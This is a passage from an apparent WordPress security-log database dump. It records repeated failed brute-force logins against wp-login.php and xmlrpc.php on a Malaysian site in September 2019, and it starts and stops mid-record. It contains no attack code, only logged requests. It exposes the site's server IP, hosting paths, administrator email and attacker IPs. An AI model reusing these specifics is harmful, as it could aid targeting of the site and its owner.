empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.79.30\";s:11:\"REMOTE_PORT\";s:5:\"53414\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWy1Bj42Bg6xBpmAmGz7aQAAAEg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567405318.2714\";s:12:\"REQUEST_TIME\";s:10:\"1567405318\";}}','notice','2019-09-02 06:21:59','2019-09-02 06:21:58',17685792,19175840,'https://bintara.com.my/wp-login.php',1,0,'37.187.79.30'),(23546,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"173.236.72.146\";s:11:\"REMOTE_PORT\";s:5:\"60364\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWyxmj42Bg6xBpmAmGz2ZAAAAFM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567404442.6807\";s:12:\"REQUEST_TIME\";s:10:\"1567404442\";}}','notice','2019-09-02 06:07:24','2019-09-02 06:07:23',18205416,19502752,'https://bintara.com.my/xmlrpc.php',1,0,'173.236.72.146'),(23545,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"173.236.72.146\";s:11:\"REMOTE_PORT\";s:5:\"60057\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWyxl8HMNng1AySUGya@FgAAAMg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567404439.8687\";s:12:\"REQUEST_TIME\";s:10:\"1567404439\";}}','notice','2019-09-02 06:07:21','2019-09-02 06:07:20',17686040,19177120,'https://bintara.com.my/wp-login.php',1,0,'173.236.72.146'),(23544,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.136.94.207\";s:11:\"REMOTE_PORT\";s:5:\"47228\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWyt9z42Bg6xBpmAmGzwIQAAAFA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567403511.7716\";s:12:\"REQUEST_TIME\";s:10:\"1567403511\";}}','notice','2019-09-02 05:51:53','2019-09-02 05:51:52',18205128,19504184,'https://bintara.com.my/xmlrpc.php',1,0,'213.136.94.207'),(23543,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.136.94.207\";s:11:\"REMOTE_PORT\";s:5:\"46762\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWyt9DU4VuPOeWsfkg08twAAAQA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567403508.4416\";s:12:\"REQUEST_TIME\";s:10:\"1567403508\";}}','notice','2019-09-02 05:51:49','2019-09-02 05:51:48',17685800,19175600,'https://bintara.com.my/wp-login.php',1,0,'213.136.94.207'),(23542,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"223.25.99.34\";s:11:\"REMOTE_PORT\";s:5:\"20237\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWyqxz42Bg6xBpmAmGzrVQAAAFI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567402695.0885\";s:12:\"REQUEST_TIME\";s:10:\"1567402695\";}}','notice','2019-09-02 05:38:16','2019-09-02 05:38:15',18205312,19503152,'https://bintara.com.my/xmlrpc.php',1,0,'223.25.99.34'),(23541,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"223.25.99.34\";s:11:\"REMOTE_PORT\";s:5:\"41265\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWyqxD42Bg6xBpmAmGzrUwAAAFM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567402692.9629\";s:12:\"REQUEST_TIME\";s:10:\"1567402692\";}}','notice','2019-09-02 05:38:14','2019-09-02 05:38:13',17685440,19176232,'https://bintara.com.my/wp-login.php',1,0,'223.25.99.34'),(23540,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"188.166.235.142\";s:11:\"REMOTE_PORT\";s:5:\"59026\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWynLz42Bg6xBpmAmGzoQQAAAEI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567401775.8871\";s:12:\"REQUEST_TIME\";s:10:\"1567401775\";}}','notice','2019-09-02 05:22:57','2019-09-02 05:22:56',18205032,19502984,'https://bintara.com.my/xmlrpc.php',1,0,'188.166.235.142'),(23539,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"188.166.235.142\";s:11:\"REMOTE_PORT\";s:5:\"58778\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWynLTU4VuPOeWsfkg05pQAAAQw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567401773.8697\";s:12:\"REQUEST_TIME\";s:10:\"1567401773\";}}','notice','2019-09-02 05:22:55','2019-09-02 05:22:54',17684360,19174888,'https://bintara.com.my/wp-login.php',1,0,'188.166.235.142'),(23538,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 